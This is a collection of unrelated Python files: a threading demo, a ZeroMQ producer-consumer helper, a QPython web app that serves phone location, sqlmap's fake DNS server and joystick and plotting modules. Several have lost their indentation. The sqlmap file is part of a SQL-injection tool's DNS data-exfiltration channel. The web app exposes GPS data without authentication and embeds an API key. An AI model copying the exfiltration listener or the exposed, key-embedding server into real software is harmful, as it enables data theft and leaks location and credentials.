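#       while True:
#           sock.send(input().encode('ascii'))  # e.g. '**help', '**chatlist', '**broadcast hi'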
|
part1.py
|
import threading
import time
def sleeper(n, name):
print(f'Thread {name} is going to sleep.')
time.sleep(n)
print(f'Thread {name} has just woken up.')
t = threading.Thread(target=sleeper, name='Thread1', args=(5, 'Thread1'))
t.start()
t.join()
print('Finish!')
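# Hedged follow-up sketch (not in the original file): the same sleeper run on
# several threads at once; calling join() on each makes the main thread wait
# until every worker has finished.
workers = [threading.Thread(target=sleeper, args=(2, f'Worker-{i}')) for i in range(3)]
for w in workers:
    w.start()
for w in workers:
    w.join()
print('All workers finished!')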
|
parallel.py
|
"""Utilities for speeding things up through parallelism.
Currently including:
* A very simple PUSH-PULL reusable producer-consumer pattern
using a ZeroMQ socket instead of the (slow, unnecessarily
copying) multiprocessing.Queue. See :func:`producer_consumer`.
"""
from multiprocessing import Process
import zmq
def _producer_wrapper(f, port, addr='tcp://127.0.0.1'):
"""A shim that sets up a socket and starts the producer callable.
Parameters
----------
f : callable
Callable that takes a single argument, a handle
for a ZeroMQ PUSH socket. Must be picklable.
port : int
The port on which the socket should connect.
addr : str, optional
Address to which the socket should connect. Defaults
to localhost ('tcp://127.0.0.1').
"""
try:
context = zmq.Context()
socket = context.socket(zmq.PUSH)
socket.connect(':'.join([addr, str(port)]))
f(socket)
finally:
# Works around a Python 3.x bug.
context.destroy()
def _spawn_producer(f, port, addr='tcp://127.0.0.1'):
"""Start a process that sends results on a PUSH socket.
Parameters
----------
f : callable
Callable that takes a single argument, a handle
for a ZeroMQ PUSH socket. Must be picklable.
Returns
-------
process : multiprocessing.Process
The process handle of the created producer process.
"""
process = Process(target=_producer_wrapper, args=(f, port, addr))
process.start()
return process
def producer_consumer(producer, consumer, addr='tcp://127.0.0.1',
port=None, context=None):
"""A producer-consumer pattern.
Parameters
----------
producer : callable
Callable that takes a single argument, a handle
for a ZeroMQ PUSH socket. Must be picklable.
consumer : callable
Callable that takes a single argument, a handle
for a ZeroMQ PULL socket.
addr : str, optional
Address to which the socket should connect. Defaults
to localhost ('tcp://127.0.0.1').
port : int, optional
The port on which the consumer should listen.
context : zmq.Context, optional
The ZeroMQ Context to use. One will be created otherwise.
Returns
-------
result
Passes along whatever `consumer` returns.
Notes
-----
This sets up a PULL socket in the calling process and forks
a process that calls `producer` on a PUSH socket. When the
consumer returns, the producer process is terminated.
Wrap `consumer` or `producer` in a `functools.partial` object
in order to send additional arguments; the callables passed in
should expect only one required, positional argument, the socket
handle.
"""
context_created = False
if context is None:
context_created = True
context = zmq.Context()
try:
consumer_socket = context.socket(zmq.PULL)
if port is None:
port = consumer_socket.bind_to_random_port(addr)
try:
process = _spawn_producer(producer, port, addr)
result = consumer(consumer_socket)
finally:
process.terminate()
return result
finally:
# Works around a Python 3.x bug.
if context_created:
context.destroy()
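# Hedged usage sketch (not part of the original module): a producer that pushes
# ten integers and a consumer that sums them. The callables are defined at
# module level so the producer stays picklable for the spawned process.
def _example_producer(socket):
    for i in range(10):
        socket.send_pyobj(i)

def _example_consumer(socket):
    return sum(socket.recv_pyobj() for _ in range(10))

if __name__ == '__main__':
    print(producer_consumer(_example_producer, _example_consumer))  # expected: 45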
|
main.py
|
#-*-coding:utf8;-*-
"""
This is a sample for qpython webapp
"""
import os.path
from bottle import Bottle, ServerAdapter
from bottle import template,request,response,redirect,HTTPResponse
root = os.path.dirname(os.path.abspath(__file__))  # get the directory of this script
try:
import androidhelper
Droid = androidhelper.Android()
Droid.startLocating(5000,5)
except:
print("no androidhelper")
class MyWSGIRefServer(ServerAdapter):
server = None
def run(self, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
if self.quiet:
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw): pass
self.options['handler_class'] = QuietHandler
self.server = make_server(self.host, self.port, handler, **self.options)
self.server.serve_forever()
def stop(self):
#sys.stderr.close()
import threading
threading.Thread(target=self.server.shutdown).start()
#self.server.shutdown()
self.server.server_close() #<--- alternative but causes bad fd exception
print ("# qpyhttpd stop")
def __exit():
Droid.stopLocating()
global server
server.stop()
def __ping():
return "ok"
def index():
Droid.vibrate()
return """<html><body>
<button onclick='location.href="/hello"'>显示我在哪里</button>
<img style="-webkit-user-select: none;" src="https://restapi.amap.com/v3/staticmap?location=118.391761,35.023749000000002&zoom=10&size=750*300&markers=mid,,A:118.391761,35.023749000000002&key=3975f37408a3ab4904502e3630639014">
</body></html>"""
# see the JavaScript location object properties for details
def hello():
location = Droid.getLastKnownLocation().result
location = location.get('network', location.get('gps'))
#location = {"latitude":"116.387884","longitude":"39.929986"}
return template(root+'/baidu.tpl',lat=location['latitude'],lng=location['longitude'])
"""以前用过的前端页面都是.html格式的,现在出现了.tpl文件,是template的缩写,发现他就是前端页面,写的也是html。
应该是前端模板Smarty的一个格式。【就是一个文本文件】可以在Dreamviewer中打开,进行可视化编辑。应该也可以使用PS打开。"""
if __name__ == '__main__':
app = Bottle()
app.route('/', method='GET')(index)
app.route('/hello', method='GET')(hello)
app.route('/__exit', method=['GET','HEAD'])(__exit)
app.route('/__ping', method=['GET','HEAD'])(__ping)
try:
server = MyWSGIRefServer(host="0.0.0.0", port="8080")  # bound to 0.0.0.0 so it can also be reached from a computer on the same network
app.run(server=server,reloader=False)
except Exception as ex:
print ("Exception: %s" % repr(ex))
|
dns.py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function
import os
import re
import socket
import threading
import time
class DNSQuery(object):
"""
Used for making fake DNS resolution responses based on received
raw request
Reference(s):
http://code.activestate.com/recipes/491264-mini-fake-dns-server/
https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py
"""
def __init__(self, raw):
self._raw = raw
self._query = ""
type_ = (ord(raw[2]) >> 3) & 15 # Opcode bits
if type_ == 0: # Standard query
i = 12
j = ord(raw[i])
while j != 0:
self._query += raw[i + 1:i + j + 1] + '.'
i = i + j + 1
j = ord(raw[i])
def response(self, resolution):
"""
Crafts raw DNS resolution response packet
"""
retVal = ""
if self._query:
retVal += self._raw[:2] # Transaction ID
retVal += "\x85\x80" # Flags (Standard query response, No error)
retVal += self._raw[4:6] + self._raw[4:6] + "\x00\x00\x00\x00" # Questions and Answers Counts
retVal += self._raw[12:(12 + self._raw[12:].find("\x00") + 5)] # Original Domain Name Query
retVal += "\xc0\x0c" # Pointer to domain name
retVal += "\x00\x01" # Type A
retVal += "\x00\x01" # Class IN
retVal += "\x00\x00\x00\x20" # TTL (32 seconds)
retVal += "\x00\x04" # Data length
retVal += "".join(chr(int(_)) for _ in resolution.split('.')) # 4 bytes of IP
return retVal
class DNSServer(object):
def __init__(self):
self._check_localhost()
self._requests = []
self._lock = threading.Lock()
try:
self._socket = socket._orig_socket(socket.AF_INET, socket.SOCK_DGRAM)
except AttributeError:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(("", 53))
self._running = False
self._initialized = False
def _check_localhost(self):
response = ""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("", 53))
s.send("6509012000010000000000010377777706676f6f676c6503636f6d00000100010000291000000000000000".decode("hex")) # A www.google.com
response = s.recv(512)
except:
pass
finally:
if response and "google" in response:
raise socket.error("another DNS service already running on *:53")
def pop(self, prefix=None, suffix=None):
"""
Returns received DNS resolution request (if any) that has given
prefix/suffix combination (e.g. prefix.<query result>.suffix.domain)
"""
retVal = None
with self._lock:
for _ in self._requests:
if prefix is None and suffix is None or re.search(r"%s\..+\.%s" % (prefix, suffix), _, re.I):
retVal = _
self._requests.remove(_)
break
return retVal
def run(self):
"""
Runs a DNSServer instance as a daemon thread (killed by program exit)
"""
def _():
try:
self._running = True
self._initialized = True
while True:
data, addr = self._socket.recvfrom(1024)
_ = DNSQuery(data)
self._socket.sendto(_.response("127.0.0.1"), addr)
with self._lock:
self._requests.append(_._query)
except KeyboardInterrupt:
raise
finally:
self._running = False
thread = threading.Thread(target=_)
thread.daemon = True
thread.start()
if __name__ == "__main__":
server = None
try:
server = DNSServer()
server.run()
while not server._initialized:
time.sleep(0.1)
while server._running:
while True:
_ = server.pop()
if _ is None:
break
else:
print("[i] %s" % _)
time.sleep(1)
except socket.error as ex:
if 'Permission' in str(ex):
print("[x] Please run with sudo/Administrator privileges")
else:
raise
except KeyboardInterrupt:
os._exit(0)
finally:
if server:
server._running = False
|
function_plot.py
|
# Copyright(c) 2020 Max Planck Gesellschaft
# Author: Vincent Berenz
from pyqtgraph.Qt import QtGui, QtCore, QtWidgets
import pyqtgraph as pg
from collections import deque
import threading, math, time
pg.setConfigOptions(antialias=True)
class _Channel:
__slots__=["_get_function",
"_color",
"_curve",
"_data",
"_plot",
"_first"]
def __init__(self,get_function,color,data_size,limits):
self._get_function = get_function
self._color = color
self._data = deque([limits[0]]*data_size,data_size)
self._data[1]=limits[1]
self._curve = None
self._first = True
def get_color(self):
return self._color
def stop(self):
self._plot.close()
def set_curve(self,curve,plot):
self._curve = curve
self._plot = plot
def update(self):
v = self._get_function()
if v is not None:
self._data.append(v)
self._curve.setData(self._data)
if self._first:
self._plot.enableAutoRange('xy', False)
self._first=False
class _Subplot:
__slots__= ["_channels","_limits","_data_size"]
def __init__(self,limit_min,limit_max,data_size):
self._data_size = data_size
self._channels = []
self._limits = (limit_min,limit_max)
def add_channel(self,channel):
self._channels.append(channel)
def add_channels(self,function_colors):
for function,color in function_colors:
self._channels.append(_Channel(function,
color,self._data_size,
self._limits))
def get_channels(self):
return self._channels
class Plot():
def __init__(self,
title,
period,
windows_size):
self._title = title
self._period = period
self._subplots = []
self._windows_size = windows_size
self._timer = None
def add_subplot(self,limits,data_size,function_colors):
subplot = _Subplot(limits[0],limits[1],data_size)
subplot.add_channels(function_colors)
self._subplots.append(subplot)
def _update(self):
for subplot in self._subplots:
for channel in subplot.get_channels():
channel.update()
def _setup(self):
self._application = QtGui.QApplication([])
self._win = pg.GraphicsWindow(title=self._title)
self._win.resize(*self._windows_size)
self._win.setWindowTitle(self._title)
self._timer = QtCore.QTimer()
self._timer.timeout.connect(self._update)
self._timer.start(self._period)
for subplot in self._subplots:
p = self._win.addPlot()
for channel in subplot.get_channels():
curve = p.plot(pen=channel.get_color())
channel.set_curve(curve,p)
self._win.nextRow()
def stop(self):
self._application.quit()
self._thread.join()
def _run(self):
self._setup()
self._application.exec_()
def start(self):
self._thread = threading.Thread(target=self._run)
self._thread.start()
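# Usage sketch (an assumption, not part of the original file): one subplot with
# a single red channel streaming a sine wave.  Note that this module targets the
# older pyqtgraph API (pg.GraphicsWindow, QtGui.QApplication); newer releases
# moved these to GraphicsLayoutWidget and QtWidgets.
if __name__ == "__main__":
    plot = Plot("demo", period=20, windows_size=(800, 600))
    plot.add_subplot(limits=(-1.0, 1.0),
                     data_size=500,
                     function_colors=[(lambda: math.sin(2.0 * math.pi * time.time()),
                                       (255, 0, 0))])
    plot.start()
    time.sleep(10)
    plot.stop()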
|
joystick.py
|
import os
import array
import time
import math
import struct
from threading import Thread
class Joystick():
'''
An interface to a physical joystick available at /dev/input
'''
def __init__(self, dev_fn='/dev/input/js0'):
self.axis_states = {}
self.button_states = {}
self.axis_map = []
self.button_map = []
self.jsdev = None
self.dev_fn = dev_fn
# These constants were borrowed from linux/input.h
self.axis_names = {
0x00 : 'x',
0x01 : 'y',
0x02 : 'z',
0x03 : 'rx',
0x04 : 'ry',
0x05 : 'rz',
            0x06 : 'throttle',
0x07 : 'rudder',
0x08 : 'wheel',
0x09 : 'gas',
0x0a : 'brake',
0x10 : 'hat0x',
0x11 : 'hat0y',
0x12 : 'hat1x',
0x13 : 'hat1y',
0x14 : 'hat2x',
0x15 : 'hat2y',
0x16 : 'hat3x',
0x17 : 'hat3y',
0x18 : 'pressure',
0x19 : 'distance',
0x1a : 'tilt_x',
0x1b : 'tilt_y',
0x1c : 'tool_width',
0x20 : 'volume',
0x28 : 'misc',
}
self.button_names = {
0x120 : 'trigger',
0x121 : 'thumb',
0x122 : 'thumb2',
0x123 : 'top',
0x124 : 'top2',
0x125 : 'pinkie',
0x126 : 'base',
0x127 : 'base2',
0x128 : 'base3',
0x129 : 'base4',
0x12a : 'base5',
0x12b : 'base6',
#PS3 sixaxis specific
0x12c : "triangle",
0x12d : "circle",
0x12e : "cross",
0x12f : 'square',
0x130 : 'a',
0x131 : 'b',
0x132 : 'c',
0x133 : 'x',
0x134 : 'y',
0x135 : 'z',
0x136 : 'tl',
0x137 : 'tr',
0x138 : 'tl2',
0x139 : 'tr2',
0x13a : 'select',
0x13b : 'start',
0x13c : 'mode',
0x13d : 'thumbl',
0x13e : 'thumbr',
0x220 : 'dpad_up',
0x221 : 'dpad_down',
0x222 : 'dpad_left',
0x223 : 'dpad_right',
# XBox 360 controller uses these codes.
0x2c0 : 'dpad_left',
0x2c1 : 'dpad_right',
0x2c2 : 'dpad_up',
0x2c3 : 'dpad_down',
}
def init(self):
        '''
        call once to setup connection to /dev/input/js0 and map buttons
        '''
        from fcntl import ioctl
# Open the joystick device.
print('Opening %s...' % self.dev_fn)
self.jsdev = open(self.dev_fn, 'rb')
# Get the device name.
buf = array.array('B', [0] * 64)
ioctl(self.jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)
self.js_name = buf.tobytes().decode('utf-8')
print('Device name: %s' % self.js_name)
# Get number of axes and buttons.
buf = array.array('B', [0])
ioctl(self.jsdev, 0x80016a11, buf) # JSIOCGAXES
self.num_axes = buf[0]
buf = array.array('B', [0])
ioctl(self.jsdev, 0x80016a12, buf) # JSIOCGBUTTONS
self.num_buttons = buf[0]
# Get the axis map.
buf = array.array('B', [0] * 0x40)
ioctl(self.jsdev, 0x80406a32, buf) # JSIOCGAXMAP
for axis in buf[:self.num_axes]:
axis_name = self.axis_names.get(axis, 'unknown(0x%02x)' % axis)
self.axis_map.append(axis_name)
self.axis_states[axis_name] = 0.0
# Get the button map.
buf = array.array('H', [0] * 200)
ioctl(self.jsdev, 0x80406a34, buf) # JSIOCGBTNMAP
for btn in buf[:self.num_buttons]:
btn_name = self.button_names.get(btn, 'unknown(0x%03x)' % btn)
self.button_map.append(btn_name)
self.button_states[btn_name] = 0
return True
def show_map(self):
'''
list the buttons and axis found on this joystick
'''
        print('%d axes found: %s' % (self.num_axes, ', '.join(self.axis_map)))
        print('%d buttons found: %s' % (self.num_buttons, ', '.join(self.button_map)))
def poll(self):
'''
query the state of the joystick, returns button which was pressed, if any,
and axis which was moved, if any. button_state will be None, 1, or 0 if no changes,
pressed, or released. axis_val will be a float from -1 to +1. button and axis will
be the string label determined by the axis map in init.
'''
button = None
button_state = None
axis = None
axis_val = None
# Main event loop
evbuf = self.jsdev.read(8)
if evbuf:
tval, value, typev, number = struct.unpack('IhBB', evbuf)
if typev & 0x80:
#ignore initialization event
return button, button_state, axis, axis_val
if typev & 0x01:
button = self.button_map[number]
if button:
self.button_states[button] = value
button_state = value
if typev & 0x02:
axis = self.axis_map[number]
if axis:
fvalue = value / 32767.0
self.axis_states[axis] = fvalue
axis_val = fvalue
return button, button_state, axis, axis_val
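# Illustrative sketch (an assumption, not part of the original file): a minimal
# read loop built on Joystick.init()/poll().  The device path is the module's
# default and may differ on other systems.
def _example_poll_loop(dev_fn='/dev/input/js0'):
    js = Joystick(dev_fn)
    js.init()
    js.show_map()
    while True:
        button, button_state, axis, axis_val = js.poll()
        if button is not None:
            print('%s %s' % (button, 'pressed' if button_state else 'released'))
        if axis is not None:
            print('%s %.3f' % (axis, axis_val))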
class JoystickController(object):
'''
Joystick client using access to local physical input
'''
def __init__(self, poll_delay=0.0166,
max_throttle=1.0,
steering_axis='x',
throttle_axis='rz',
steering_scale=1.0,
throttle_scale=-1.0,
dev_fn='/dev/input/js0',
auto_record_on_throttle=True):
self.angle = 0.0
self.throttle = 0.0
self.mode = 'user'
self.poll_delay = poll_delay
self.running = True
self.max_throttle = max_throttle
self.steering_axis = steering_axis
self.throttle_axis = throttle_axis
self.steering_scale = steering_scale
self.throttle_scale = throttle_scale
self.recording = False
self.constant_throttle = False
self.auto_record_on_throttle = auto_record_on_throttle
#init joystick
self.js = Joystick(dev_fn)
self.js.init()
#start thread to poll it
self.thread = Thread(target=self.update)
        self.thread.daemon = True
self.thread.start()
def on_throttle_changes(self):
'''
        Turn on recording when there is non-zero throttle in user mode.
'''
if self.auto_record_on_throttle:
self.recording = (self.throttle != 0.0 and self.mode == 'user')
def update(self):
'''
poll a joystick for input events
button map name => PS3 button => function
        * base = PS3 dpad down => increase throttle scale (toward 0.0)
        * top2 = PS3 dpad up => decrease throttle scale (toward -1.0)
* base2 = PS3 dpad left => increase steering scale
* pinkie = PS3 dpad right => decrease steering scale
* trigger = PS3 select => switch modes
* top = PS3 start => toggle constant throttle
* base5 = PS3 left trigger 1
* base3 = PS3 left trigger 2
* base6 = PS3 right trigger 1
* base4 = PS3 right trigger 2
* thumb2 = PS3 right thumb
* thumb = PS3 left thumb
        * circle = PS3 circle => toggle recording
* triangle = PS3 triangle => increase max throttle
* cross = PS3 cross => decrease max throttle
'''
while self.running:
button, button_state, axis, axis_val = self.js.poll()
if axis == self.steering_axis:
self.angle = self.steering_scale * axis_val
print("angle", self.angle)
if axis == self.throttle_axis:
#this value is often reversed, with positive value when pulling down
self.throttle = (self.throttle_scale * axis_val * self.max_throttle)
print("throttle", self.throttle)
self.on_throttle_changes()
if button == 'trigger' and button_state == 1:
'''
switch modes from:
user: human controlled steer and throttle
local_angle: ai steering, human throttle
local: ai steering, ai throttle
'''
if self.mode == 'user':
self.mode = 'local_angle'
elif self.mode == 'local_angle':
self.mode = 'local'
else:
self.mode = 'user'
print('new mode:', self.mode)
if button == 'circle' and button_state == 1:
'''
toggle recording on/off
'''
if self.auto_record_on_throttle:
print('auto record on throttle is enabled.')
elif self.recording:
self.recording = False
else:
self.recording = True
print('recording:', self.recording)
if button == 'triangle' and button_state == 1:
'''
increase max throttle setting
'''
self.max_throttle = round(min(1.0, self.max_throttle + 0.05), 2)
if self.constant_throttle:
self.throttle = self.max_throttle
self.on_throttle_changes()
print('max_throttle:', self.max_throttle)
if button == 'cross' and button_state == 1:
'''
decrease max throttle setting
'''
self.max_throttle = round(max(0.0, self.max_throttle - 0.05), 2)
if self.constant_throttle:
self.throttle = self.max_throttle
self.on_throttle_changes()
print('max_throttle:', self.max_throttle)
if button == 'base' and button_state == 1:
'''
increase throttle scale
'''
self.throttle_scale = round(min(0.0, self.throttle_scale + 0.05), 2)
print('throttle_scale:', self.throttle_scale)
if button == 'top2' and button_state == 1:
'''
decrease throttle scale
'''
self.throttle_scale = round(max(-1.0, self.throttle_scale - 0.05), 2)
print('throttle_scale:', self.throttle_scale)
if button == 'base2' and button_state == 1:
'''
increase steering scale
'''
self.steering_scale = round(min(1.0, self.steering_scale + 0.05), 2)
print('steering_scale:', self.steering_scale)
if button == 'pinkie' and button_state == 1:
'''
decrease steering scale
'''
self.steering_scale = round(max(0.0, self.steering_scale - 0.05), 2)
print('steering_scale:', self.steering_scale)
if button == 'top' and button_state == 1:
'''
toggle constant throttle
'''
if self.constant_throttle:
self.constant_throttle = False
self.throttle = 0
self.on_throttle_changes()
else:
self.constant_throttle = True
self.throttle = self.max_throttle
self.on_throttle_changes()
print('constant_throttle:', self.constant_throttle)
time.sleep(self.poll_delay)
def run_threaded(self, img_arr=None):
self.img_arr = img_arr
return self.angle, self.throttle, self.mode, self.recording
def shutdown(self):
self.running = False
time.sleep(0.5)
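# Usage sketch (an assumption, not part of the original file): the controller
# polls the device in its own thread, so a caller only reads the latest state
# via run_threaded() once per loop iteration.
if __name__ == "__main__":
    controller = JoystickController()
    try:
        while True:
            angle, throttle, mode, recording = controller.run_threaded()
            print('angle=%.2f throttle=%.2f mode=%s recording=%s' %
                  (angle, throttle, mode, recording))
            time.sleep(0.5)
    except KeyboardInterrupt:
        controller.shutdown()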
|